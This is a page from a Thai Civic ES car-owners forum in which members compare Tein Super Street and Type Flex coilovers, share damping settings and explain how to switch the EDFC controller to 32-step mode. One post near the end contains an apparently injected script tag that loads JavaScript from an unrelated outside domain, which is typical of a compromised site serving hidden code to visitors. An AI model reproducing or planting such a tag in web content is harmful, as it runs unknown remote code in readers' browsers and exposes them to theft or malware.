ลองปรับเบอร์หนืดๆขึ้นเรื่อยๆดูครับ ถ้ายิ่งวิ่งเร็วๆ แล้วรู้สึกตัวเริ่มไม่อยู่กับเบาะแล้วแปลว่าคุณปรับหนืดมากไปครับ

เพราะ type flex อาการรถรู้สึกได้เร็วมากๆ อย่างที่ผมบอกไปครับ ให้ลองกับตัวเอง มามิตติ้ง หาเพื่อนๆที่ใส่อยู่ครับ ลองได้เลย

เพื่อนๆในนี้ใจดีทุกคนครับ

เป้..Flex..ปรับ20-24...เลยเหร๊อ...เคยถามมาสเตอร์ชอป..เค้าบอกปรับใด้จริงแค่16เองอะ..งงๆ แล้วผมก็ปรับ หน้า12 หลัง10.. ..เคยลองปรับ14-16 วิ่งไม่ใด้เลยอะเหมือนกับว่าโช้คมันดึงแรงดีดของสปริงไม่อยู่อะ..ขึ้นคอสะพานทีเด้งกว่าจะหยุดก็3-4ดึ๊งอะ..แต่ถ้าปรับหน้า-หลังไม่เกิน12นะ..สะพานสั้นๆขึ้นอีกทางโดดไปลงอีกทางใด้เลยอะ.ดึ๊งเดียวอยู่


ปกติปรับมือได้ 16ระดับ แต่ถ้าใส่ EDFC จะปรับไ้เด้ 32 ระดับครับ เหมือนมันจะปรับได้ครึ่งกริ๊ก ส่วนตัวปรับไว้ที่ 2-3 ไม่ก็ 4-6 แข็งดีครับแต่ขับเจอถนนแย่ เหนื่อยหน่อยครับ
ได้รับคำขอบคุณจาก: PAE KUNG 
jacky19


ชื่อเล่น: แก๊ส

เข้าร่วม: 24 สิงหา 2009
ตอบ: 612

Guru ES
Guru ES

ได้รับคำขอบคุณ: 568
ให้คำขอบคุณ: 602

ที่อยู่: นนท์
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 5 ตุลา 2011 16:25 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
idris พิมพ์ว่า:
PAE KUNG พิมพ์ว่า:
Njaichuen พิมพ์ว่า:
ผมคิดว่าจะใส่ tein ตัว flex อ่ะคับ
ใครใส่อยู่ช่วยบอกอารมอีกรอบนะคับ
.......อยากให้มั่นใจนีสสสสนึง



เอาอารมณ์แบบไหนดีล่ะคร๊าบ

เอาเป็นว่านะครับ ตอนที่ผมใส่ ตัวนี้ผมก็ Happy นะครับ (ถ้าไม่ได้ไปลอง Mono flex)แบบเต็มๆ

ถ้าผมจำไม่ผิด เบอร์ที่ผมขับแล้วรู้สึกว่าเกาะที่สุดเด้งน้อยที่สุด หน้า 24 หลัง 22-20 นะครับ (ใช้ edfc)ปรับ

ส่วนเบอร์ที่หนืดกว่านี้ ก็มันดีครับแข็งดี เลี้ยวคมมาก แต่อาการรถจะออกแนวดิ้นๆ โดดๆ หน่อยครับ แต่เกาะแน่นอน

ลองปรับเบอร์หนืดๆขึ้นเรื่อยๆดูครับ ถ้ายิ่งวิ่งเร็วๆ แล้วรู้สึกตัวเริ่มไม่อยู่กับเบาะแล้วแปลว่าคุณปรับหนืดมากไปครับ

เพราะ type flex อาการรถรู้สึกได้เร็วมากๆ อย่างที่ผมบอกไปครับ ให้ลองกับตัวเอง มามิตติ้ง หาเพื่อนๆที่ใส่อยู่ครับ ลองได้เลย

เพื่อนๆในนี้ใจดีทุกคนครับ

เป้..Flex..ปรับ20-24...เลยเหร๊อ...เคยถามมาสเตอร์ชอป..เค้าบอกปรับใด้จริงแค่16เองอะ..งงๆ แล้วผมก็ปรับ หน้า12 หลัง10.. ..เคยลองปรับ14-16 วิ่งไม่ใด้เลยอะเหมือนกับว่าโช้คมันดึงแรงดีดของสปริงไม่อยู่อะ..ขึ้นคอสะพานทีเด้งกว่าจะหยุดก็3-4ดึ๊งอะ..แต่ถ้าปรับหน้า-หลังไม่เกิน12นะ..สะพานสั้นๆขึ้นอีกทางโดดไปลงอีกทางใด้เลยอะ.ดึ๊งเดียวอยู่



เทพแห่งโช๊คเข้ามาตอบเลย
idris


ชื่อเล่น: ลิตย์

เข้าร่วม: 12 มีนา 2009
ตอบ: 575

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 1729
ให้คำขอบคุณ: 710

ที่อยู่: มีนบุรี
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 5 ตุลา 2011 21:31 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
jacky19 พิมพ์ว่า:
idris พิมพ์ว่า:
PAE KUNG พิมพ์ว่า:
Njaichuen พิมพ์ว่า:
ผมคิดว่าจะใส่ tein ตัว flex อ่ะคับ
ใครใส่อยู่ช่วยบอกอารมอีกรอบนะคับ
.......อยากให้มั่นใจนีสสสสนึง



เอาอารมณ์แบบไหนดีล่ะคร๊าบ

เอาเป็นว่านะครับ ตอนที่ผมใส่ ตัวนี้ผมก็ Happy นะครับ (ถ้าไม่ได้ไปลอง Mono flex)แบบเต็มๆ

ถ้าผมจำไม่ผิด เบอร์ที่ผมขับแล้วรู้สึกว่าเกาะที่สุดเด้งน้อยที่สุด หน้า 24 หลัง 22-20 นะครับ (ใช้ edfc)ปรับ

ส่วนเบอร์ที่หนืดกว่านี้ ก็มันดีครับแข็งดี เลี้ยวคมมาก แต่อาการรถจะออกแนวดิ้นๆ โดดๆ หน่อยครับ แต่เกาะแน่นอน

ลองปรับเบอร์หนืดๆขึ้นเรื่อยๆดูครับ ถ้ายิ่งวิ่งเร็วๆ แล้วรู้สึกตัวเริ่มไม่อยู่กับเบาะแล้วแปลว่าคุณปรับหนืดมากไปครับ

เพราะ type flex อาการรถรู้สึกได้เร็วมากๆ อย่างที่ผมบอกไปครับ ให้ลองกับตัวเอง มามิตติ้ง หาเพื่อนๆที่ใส่อยู่ครับ ลองได้เลย

เพื่อนๆในนี้ใจดีทุกคนครับ

เป้..Flex..ปรับ20-24...เลยเหร๊อ...เคยถามมาสเตอร์ชอป..เค้าบอกปรับใด้จริงแค่16เองอะ..งงๆ แล้วผมก็ปรับ หน้า12 หลัง10.. ..เคยลองปรับ14-16 วิ่งไม่ใด้เลยอะเหมือนกับว่าโช้คมันดึงแรงดีดของสปริงไม่อยู่อะ..ขึ้นคอสะพานทีเด้งกว่าจะหยุดก็3-4ดึ๊งอะ..แต่ถ้าปรับหน้า-หลังไม่เกิน12นะ..สะพานสั้นๆขึ้นอีกทางโดดไปลงอีกทางใด้เลยอะ.ดึ๊งเดียวอยู่



เทพแห่งโช๊คเข้ามาตอบเลย

**เทพโพธ์งามอะดิ**....
ส่วนตัวนะครับใส่มาหลายรุ่น..เริ่มแรกก็ DC5....ไป Tanabe NF210(อันนี้นุ่มโดนใจ)....แล้วก็ SS ES.....ตามมาด้วย.SS DC5...ต่อด้วย โอริน PCV......ตอนนี้ tein Flex DC5..แล้วก็จะไม่เปลี่ยนอีกแล้ว ถ้าเปลี่ยนอีกก็โช้คเดิมละ
PAE KUNG


ชื่อเล่น: เป้

เข้าร่วม: 08 ตุลา 2008
ตอบ: 1131

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2818
ให้คำขอบคุณ: 3696

ที่อยู่: Bangna&Bangbon
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 5 ตุลา 2011 23:10 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
พี่ลิสผมปรับ edfc ครับ อีกอย่างสามารถทำให้ปรับได้ทั้ง 32 และ 16 มันมีวิธีตั้งครับพี่

ส่วนปรับมือ ผมก็หมุนได้เป็นสามสิบคลิกนะพี่ ทั้ง Flex และ Mono flex ตอนนี้
anugul


ชื่อเล่น: นพ

เข้าร่วม: 16 พฤษภาคม 2011
ตอบ: 723

Guru ES
Guru ES

ได้รับคำขอบคุณ: 219
ให้คำขอบคุณ: 57

ที่อยู่: (สนามบินภูเก็ต)
ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
พฤหัส, 6 ตุลา 2011 01:32 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
ได้รับคำขอบคุณจาก: vor_ped 
weezer


เข้าร่วม: 31 พฤษภาคม 2010
ตอบ: 21

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 38
ให้คำขอบคุณ: 2

ที่อยู่: พุทธมณฑลสาย 3
พฤหัส, 6 ตุลา 2011 09:21 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
PAE KUNG พิมพ์ว่า:
พี่ลิสผมปรับ edfc ครับ อีกอย่างสามารถทำให้ปรับได้ทั้ง 32 และ 16 มันมีวิธีตั้งครับพี่

ส่วนปรับมือ ผมก็หมุนได้เป็นสามสิบคลิกนะพี่ ทั้ง Flex และ Mono flex ตอนนี้



32 step adjusting mode คือ EDFC สามารถเปลี่ยนโหมดจาก 16 ไปเป็น 32 พูดง่ายๆคือจากเดิมเคยปรับจาก 1 ไป 2 ตอนนี้ก้อจะเป็น 1 ไป 1.5 แล้วค่อย 2
วิธีทำก้อคือ
1.ปิดเครื่อง กดปุ่ม power ค้างใว้ประมาณ 3 วิ memory ทั้งหมดที่ตั้งใว้จะหายไปต้องตั้งใหม่ทั้งหมด
2.เปิดเครื่อง กดปุ่ม power ค้างใว้ประมาณ 3 วิ เครื่องจะเซ็ตตัวเอง
3.หลังจากเครื่องเซ็ตตัวเองเรียบร้อยแล้วให้กดปุ่ม + ทั้งสองข้างพร้อมๆกัน (หน้าและหลัง) ค้างใว้ประมาณ 3 วิบนจอจะมีคำว่า 32 ขึ้นมาเป็นอันว่าเรียบร้อยครับ ข้อควรระวังเวลากด + อย่าให้มอเตอร์ขยับนะครับให้กดพร้อมกันจริงๆถ้ามันขยับก้อให้เริ่มขั้นตอนที่ 1 ใหม่

credit พี่ใหญ่ teinclub
ได้รับคำขอบคุณจาก: Ton-  PAE KUNG  kittidech  HongTae  Phetcharat  zan  vor_ped  sophan.voratus 
hikaru_kung


เข้าร่วม: 29 ธันวา 2009
ตอบ: 3067

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4341
ให้คำขอบคุณ: 4602
พฤหัส, 6 ตุลา 2011 09:34 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
tatumz พิมพ์ว่า:
Seiko พิมพ์ว่า:
อยากทราบฟิวของ tein ss กับ tein flex
ใครใช้อยู่ อภิบายอารมณ์ การขับกันหน่อยครับ



CeaSaR พิมพ์ว่า:
อธิบายยากอ่ะ มาลองขับดูเลยมั้ย Tein flax DC5 ยินดีให้ลองได้ตลอด




ช่ายความรู้สึกของคนไม่เหมือนกัน (เหมือนทำนอง ซี๊ดโอ้ววววว 55)มันต้องลอง มีคนให้ลองผมก้อว่าดีกว่าไม่ลองเยอะเลย
ถ้าซื้อไปแล้วไม่ด้ายดั่งใจก้ออย่างงั้น เพราะของมันแพงอ่ะ ลองแล้วอาจไม่ชอบก้อด้าย..อิอิ

ถ้ามาลอง Flex คันนี้ของเจ้าน็อต เด๋วแถม ss ให้ลองอีกคันเลย..555 ยิง 1 ได้ 2 <script src="https://sport32news.com/civicesgroup.js"></



คราวหน้าให้น้องลองบ้างงงนะ หิๆๆ
ตอบ
หน้า 2 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.